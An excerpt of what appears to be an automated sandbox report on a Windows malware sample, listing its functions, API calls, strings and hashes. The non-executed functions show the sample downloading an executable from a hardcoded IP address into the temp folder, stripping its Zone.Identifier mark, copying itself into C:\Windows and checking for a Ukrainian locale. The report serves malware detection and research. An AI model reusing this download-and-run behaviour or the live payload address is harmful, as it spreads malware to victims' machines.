Opcode Fuzzy Hash: 25f7de04c8b00f8f37ac4a6d3bc42f69888779e154306af29f6f284285fde8ae
Instruction Fuzzy Hash: 39C04C7914020CBBCB549FE5EC4DDD97BACFB48751F108455FA098B251CAB6E9808B94

Function 00409E70 Relevance: 2.7, APIs: 2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5199f4ac4ad430b340395b2c790eff018088729ef202642ee4bea641b12d0db6
Instruction ID: 9018fa89db39be4d923d705982bd5ace5360351e168daa38d33e5c0461b43902
Opcode Fuzzy Hash: 5199f4ac4ad430b340395b2c790eff018088729ef202642ee4bea641b12d0db6
Instruction Fuzzy Hash: 1181FA74A00219DBDB24CE18C885BE973B5FB44358F50C1AAE94DAB382D734AED5CF85

Function 0040BBB0 Relevance: 2.5, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 7b213cd4d069c01e8a620414b83cfb343b0676d070a872b63673a2a7234e7122
Instruction ID: 13b3a4f761e8e0ec39884722658b832f986ab9836cdaa210380d175f348a5a39
Opcode Fuzzy Hash: 7b213cd4d069c01e8a620414b83cfb343b0676d070a872b63673a2a7234e7122
Instruction Fuzzy Hash: A2E09AB0A41204EBCB00DF88FC09B983774E744304F1281B9E81453390EBB4EE80CA8D

Function 0040B510 Relevance: 2.5, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B518
LeaveCriticalSection.KERNEL32(004165F8,?,0040BDA7), ref: 0040B528

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: ad8263c65cb201d3706fc4fef9bb1207c721a47fd2d799970df71f2cf60a6b1c
Instruction ID: 14b8899719e1d7f6bd9f87e5ca311e10c022d8288dc76d62f5c8fe7294ca2835
Opcode Fuzzy Hash: ad8263c65cb201d3706fc4fef9bb1207c721a47fd2d799970df71f2cf60a6b1c
Instruction Fuzzy Hash: BDB09B701C1329B7810037D5BC0B7C43E29D544B1539380F6B51954195AEE555C0555D

Function 00402710 Relevance: 1.6, APIs: 1, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter.LIBCMTD ref: 004027EB

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: _invalid_parameter
String ID:
API String ID: 2123368286-0
Opcode ID: 19989f559a3b6bae281f8a2dc2fc336e7f1976e9f6f2415c0a58f65694c493ae
Instruction ID: e552c4f86780a4dbe5bd1a1b92d708adfe844e7ea7dcb8881c677821ed53cb71
Opcode Fuzzy Hash: 19989f559a3b6bae281f8a2dc2fc336e7f1976e9f6f2415c0a58f65694c493ae
Instruction Fuzzy Hash: 1C41EDB8A00109EFCB04DF98D994C9EB7B6FF48304B208569F819A7381D734EE51CBA5

Function 0040CD40 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__aligned_recalloc_base.LIBCMTD ref: 0040CD67

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: __aligned_recalloc_base
String ID:
API String ID: 3433095291-0
Opcode ID: 188589c6c6f5371f9bdfae48d20a3ac9fca5ed71984b4783790b861f01069fd6
Instruction ID: faf6a6b27d618bda7eb0c01cb65bad9766fd1ccddcd1cd8bbdc964715fc70cc6
Opcode Fuzzy Hash: 188589c6c6f5371f9bdfae48d20a3ac9fca5ed71984b4783790b861f01069fd6
Instruction Fuzzy Hash: 79F012F650010CABCB04DF99ED45D9B33ADAF4C308F048529F90C97381E679E950CBA5

Function 0040AB60 Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040A800: GetCurrentProcessId.KERNEL32(?,0040A76B,?,0040D07E,00000010,?,?,?,?,?,?,0040CDEB), ref: 0040A803

RtlFreeHeap.NTDLL(02D90000,00000000,00402612,?,00402612,?), ref: 0040ABBB

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CurrentFreeHeapProcess
String ID:
API String ID: 3855406826-0
Opcode ID: 619bfd810e0c26ad7a8b13ecb3c60179b2854ed0b7b45a3f3579a8c95ad91858
Instruction ID: ab559ef0e8e170b551dfe54b009a4d3658c5c6bd361d46cd0bbc19687281446f
Opcode Fuzzy Hash: 619bfd810e0c26ad7a8b13ecb3c60179b2854ed0b7b45a3f3579a8c95ad91858
Instruction Fuzzy Hash: 2CF04474D00209ABDB04DF99D441D6DBBB6AB84304F14C1AAEA056B381EA35E951CB95

Function 0040D710 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

send.WS2_32(00000000,00000000,?,00000000), ref: 0040D72F

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
Instruction ID: e7aa79f816f91947af6fbc74e9c8fbfd3bb2dea631739c5f8479ec5b7c0f5cfd
Opcode Fuzzy Hash: 06370eea5684355e58e3ecca2704a58af4611f1d3e16c80e6b4b5217ad5f95b8
Instruction Fuzzy Hash: 58013C3890438DEFCB00DFA8C888BDE7BB4BB08314F1085A9EC55A7380D3B59699CB55

Function 0040D930 Relevance: 1.5, APIs: 1, Instructions: 25synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040BBB0: EnterCriticalSection.KERNEL32(004165F8), ref: 0040BBC0
Part of subcall function 0040BBB0: LeaveCriticalSection.KERNEL32(004165F8), ref: 0040BBEC

WaitForSingleObject.KERNEL32(000006C4,00001388), ref: 0040D95C

Part of subcall function 0040D550: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
String ID:
API String ID: 3309573332-0
Opcode ID: dea414f55044976029bfea1705a47b8f4b0a5085fa57cca7b4be92acb39eaa1a
Instruction ID: 2ee0a3073efd4fba8235a9b1d7a198457ec1c10d5c824cc9a6b08d4439e9405f
Opcode Fuzzy Hash: dea414f55044976029bfea1705a47b8f4b0a5085fa57cca7b4be92acb39eaa1a
Instruction Fuzzy Hash: E3E092B1D40308A7C714E7E5A806BAF762A9710305F54407AF600762C1DA799A44D7DC

Function 00407670 Relevance: 1.5, APIs: 1, Instructions: 23comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
Instruction ID: d29105fc803771725095f39a6bc68a1d0ed1c954ca33f5653c88c8c6fc3524cf
Opcode Fuzzy Hash: 34e119f03330a37951e29d4ee19d5d58663b392051cfe4a9acefb3e3966ee614
Instruction Fuzzy Hash: 07E0ED74D1020CFFDF00DF94C889BDEBBB8AB44315F1081A9E90567280D7B96A94CB95

Function 00409CB0 Relevance: 1.4, APIs: 1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f585e5848d647f7ba98f44a578c3aab8627008f1611616fef22c9fd6c64d79f0
Instruction ID: 3330dfa097b842a7a488ec17b8b9c7df683748c841cce28906d8870d8e721c37
Opcode Fuzzy Hash: f585e5848d647f7ba98f44a578c3aab8627008f1611616fef22c9fd6c64d79f0
Instruction Fuzzy Hash: D9512B74600209EBDB04DF18C895FEA73A5FB48318F24857AE9299B382D735EE51CB84

Function 00402540 Relevance: 1.3, APIs: 1, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

memcpy.NTDLL(00000000,?,004024FF), ref: 004025F1

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 003a0e8c18067fecf3b08c50e852eb1bba0ba506ffdb6ae14e986818a952058c
Instruction ID: 64e9503c27af5828c57b21208a77217ab4b39b6faaaa4d03522f211e53aa4793
Opcode Fuzzy Hash: 003a0e8c18067fecf3b08c50e852eb1bba0ba506ffdb6ae14e986818a952058c
Instruction Fuzzy Hash: 7A41EAB9A00208EFCB04DF94C59199EBBB5FF49314F20C5A9E819AB381D735EE41DB85

Function 0040C310 Relevance: 1.3, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0040C34F

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 229a0221ec898bac06963efcfd6839d4a441ca8df59a2ebf4f072cbf2a2901ec
Instruction ID: e66e4651a1033cb0a1a859d50de709900647e4399b191a2d0bdb1657cb37730b
Opcode Fuzzy Hash: 229a0221ec898bac06963efcfd6839d4a441ca8df59a2ebf4f072cbf2a2901ec
Instruction Fuzzy Hash: FC412C79A00304DFC708EF44E881AAA7BB2FB4C324B16826DF9055B395D375E995CF98

Function 0040A510 Relevance: 1.3, APIs: 1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9a17e562121240b50e18342ff29bb7a47b48788b8a8a72522e6dd27721dde94
Instruction ID: 204a74d382af71bf333f3cbb89a072d8910a3b39e084b6e50900784b7b3b1d46
Opcode Fuzzy Hash: b9a17e562121240b50e18342ff29bb7a47b48788b8a8a72522e6dd27721dde94
Instruction Fuzzy Hash: 12313075900208FBCB04CF54D945B9A37B5BB44309F18857AE8096F381D37AEEA5DB8A

Function 00405D30 Relevance: 1.3, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,00000100,?,?,?,00000000), ref: 00405D8C

Part of subcall function 004076C0: memcpy.NTDLL(00000000,?,?), ref: 004076E8
Part of subcall function 004076C0: CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
Part of subcall function 004076C0: CloseHandle.KERNEL32(00000000), ref: 00407711

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: memcpy$CloseCreateHandleThread
String ID:
API String ID: 241592544-0
Opcode ID: d1a6c51456eb3f1f8bb8e6c6fdf63fe92b3fd94511b66a8fb5e91428111d4212
Instruction ID: 7caf050ee9b179aea45d58d53746834e47f0899ed77d0615408a0675d7b2b4ba
Opcode Fuzzy Hash: d1a6c51456eb3f1f8bb8e6c6fdf63fe92b3fd94511b66a8fb5e91428111d4212
Instruction Fuzzy Hash: 91318179A04208EFC704DF58D881BDA7BB5FF88304F0481B8E9489B396D635A981CB94

Function 0040C6E0 Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

memcmp.NTDLL ref: 0040C72E

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: c06735b9bb3ca747746083835a1b84147725a79e97155fb761ee7c40afd9b0e2
Instruction ID: 6e1c982bf73a24a572eb662ea7eb90dd1456e91fb92d59b3ccb0b3fff8fbe84e
Opcode Fuzzy Hash: c06735b9bb3ca747746083835a1b84147725a79e97155fb761ee7c40afd9b0e2
Instruction Fuzzy Hash: 0A110874E00208EBDB00DBA1C881EAE77799F55304F04C27AED14A7381F639E606CB55

Function 0040C780 Relevance: 1.3, APIs: 1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2db90ea40cb3e4e99a624156167eaf50ef803cf4b6ed023375a7b27a719199
Instruction ID: 1b4390e4ee29ad65b8e359cbc1938e6215349f3d67b6f0ea2386614bd83c5173
Opcode Fuzzy Hash: 4a2db90ea40cb3e4e99a624156167eaf50ef803cf4b6ed023375a7b27a719199
Instruction Fuzzy Hash: D411A7B5D00109E7DB00DBA4DC81BAF77B45B14308F14867AFD44B72C1E67DD614975A

Function 00406300 Relevance: 1.3, APIs: 1, Instructions: 32stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406360: GetDriveTypeW.KERNEL32(?c@), ref: 0040636D

lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: DriveTypelstrcpy
String ID:
API String ID: 3664088370-0
Opcode ID: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
Instruction ID: 07938d44ddb1935cabae668892a579954ff71e0ca3886b5fa6316a5d3981c012
Opcode Fuzzy Hash: 2d61ef023cbf4c1c2148b72ea45ffb06c686e76863e737ed56d1566052f9a4a4
Instruction Fuzzy Hash: 9FF01D75900248FBDB04DFA4D4557DEB7B4EF44304F04C5A9E81AAB280E679AB58CB89

Non-executed Functions

Function 004068E0 Relevance: 107.2, APIs: 47, Strings: 14, Instructions: 407fileCOMMON

Download Yara Rule

APIs

_chkstk.NTDLL(?,004070E0,?,?,?), ref: 004068E8
wsprintfW.USER32 ref: 0040691F
wsprintfW.USER32 ref: 0040693F
wsprintfW.USER32 ref: 0040695F
wsprintfW.USER32 ref: 0040697F
wsprintfW.USER32 ref: 00406998
wsprintfW.USER32 ref: 004069B8
PathFileExistsW.SHLWAPI(?), ref: 004069C8
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406A01
DeleteFileW.KERNEL32(?), ref: 00406A0E
PathFileExistsW.SHLWAPI(?), ref: 00406A1B
PathFileExistsW.SHLWAPI(?), ref: 00406A30
SetFileAttributesW.KERNEL32(?,00000080), ref: 00406A46
DeleteFileW.KERNEL32(?), ref: 00406A53
PathFileExistsW.SHLWAPI(?), ref: 00406A60
CreateDirectoryW.KERNEL32(?,00000000), ref: 00406A73

Strings

C:\Windows\sysppvrdnvs.exe, xrefs: 00406AA6
%s\%s\rvlcfg.exe, xrefs: 00406953
%s\*, xrefs: 0040698C
%s.lnk, xrefs: 00406913
%s\%s, xrefs: 00406EC0
shell32.dll, xrefs: 00406C38
%s\%s, xrefs: 00406E4D
shell32.dll, xrefs: 00406C52
%s\%s\rvldrv.exe, xrefs: 004069AC
%s\%s, xrefs: 00406933
shell32.dll, xrefs: 00406BFC
%s\%s, xrefs: 00406973
%s\%s\%s, xrefs: 00406EE7
shell32.dll, xrefs: 00406C16

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$C:\Windows\sysppvrdnvs.exe$shell32.dll$shell32.dll$shell32.dll$shell32.dll
API String ID: 495142193-2225385857
Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69

Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
wsprintfW.USER32 ref: 004067C5
FindFirstFileW.KERNEL32(?,?), ref: 004067DC
lstrcmpW.KERNEL32(?,00411368), ref: 00406801
lstrcmpW.KERNEL32(?,0041136C), ref: 00406817
wsprintfW.USER32 ref: 0040683A
wsprintfW.USER32 ref: 0040685A
MoveFileExW.KERNEL32(?,?,00000009), ref: 00406896
FindNextFileW.KERNEL32(000000FF,?), ref: 004068AA
FindClose.KERNEL32(000000FF), ref: 004068BF
RemoveDirectoryW.KERNEL32(?), ref: 004068C9

Strings

%s\*, xrefs: 004067B9
%s\%s, xrefs: 0040684E
%s\%s, xrefs: 0040682E

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
String ID: %s\%s$%s\%s$%s\*
API String ID: 92872011-445461498
Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98

Function 0040F1B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
strcmp.NTDLL ref: 0040F1D2

Strings

UKR, xrefs: 0040F1C9

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: InfoLocalestrcmp
String ID: UKR
API String ID: 3191669094-64918367
Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA

Function 004064A0 Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 111networkfileCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004064A9
srand.MSVCRT ref: 004064B0
ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
rand.MSVCRT ref: 004064D6
rand.MSVCRT ref: 004064EA
wsprintfW.USER32 ref: 0040650F
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
CloseHandle.KERNEL32(000000FF), ref: 004065F2
wsprintfW.USER32 ref: 00406609
DeleteFileW.KERNEL32(?), ref: 00406619
CloseHandle.KERNEL32(000000FF), ref: 0040662D
InternetCloseHandle.WININET(00000000), ref: 0040663A
InternetCloseHandle.WININET(00000000), ref: 00406647

Strings

%s\%d%d.exe, xrefs: 00406505
%temp%, xrefs: 004064CB
%s:Zone.Identifier, xrefs: 004065FD
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
http://185.215.113.66/tdrp.exe, xrefs: 00406546

Memory Dump Source

